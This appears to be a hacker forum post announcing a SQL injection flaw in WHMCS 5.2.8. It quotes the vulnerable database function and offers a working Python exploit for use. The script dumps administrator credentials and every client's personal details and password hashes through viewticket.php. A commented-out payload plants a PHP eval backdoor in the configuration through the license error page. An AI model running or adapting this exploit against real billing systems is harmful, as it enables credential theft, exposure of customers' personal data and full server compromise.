WHMCS 5.2.8 Vulnerability

Here We Go again Po0r WHMCS new version again got exploited!

THIS TIME IT'S again the same mistake in

/includes/dbfunctions.php

WE Can manipulate the GET/POST variables and end up with something like $key = array('sqltype' => 'TABLEJOIN', 'value' = '[SQLI]');

FROM THIS VULNERABILITY
WE CAN EVEN change /configuration.php whatever we want (PHP code included)
[php]
function select_query($table, $fields, $where, $orderby = '', $orderbyorder = '', $limit = '', $innerjoin = '') {
global $CONFIG;
global $query_count;
global $mysql_errors;
global $whmcsmysql;
if (!$fields) {
$fields = '*';
}
$query = 'SELECT ' . $fields . ' FROM ' . db_make_safe_field($table);
if ($innerjoin) {
$query .= ' INNER JOIN ' . db_escape_string($innerjoin);
}
if ($where) {
if (is_array($where)) {
$criteria = array();
foreach ($where as $origkey => $value) {
$key = db_make_safe_field($origkey);
if (is_array($value)) {
if ($key == 'default') {
$key = '`default`';
}
if ($value['sqltype'] == 'LIKE') {
$criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\'';
continue;
}
if ($value['sqltype'] == 'NEQ') {
$criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\'';
continue;
}
if ($value['sqltype'] == '>') {
$criteria[] = $key . '>' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == '<') {
$criteria[] = $key . '<' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == '<=') {
$criteria[] = $origkey . '<=' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == '>=') {
$criteria[] = $origkey . '>=' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == 'TABLEJOIN') {
$criteria[] = $key . '=' . db_escape_string($value['value']);
continue;
}
if ($value['sqltype'] == 'IN') {
$criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')';
continue;
}
continue;
}
[...]
?>[/php]
SO Re-edit Your Previous WHMCS.py exploit script and ENJOY!

Exp:
[php]
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection
# [url]http://localhost.re/p/whmcs-528-vulnerability[/url]

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
print "Doing stuff: %s" % sqlUnion
#you could exploit any file that does a select, I randomly chose viewticket.php
r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
return re.search(r'

(.*?)

', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()[/php]

发表评论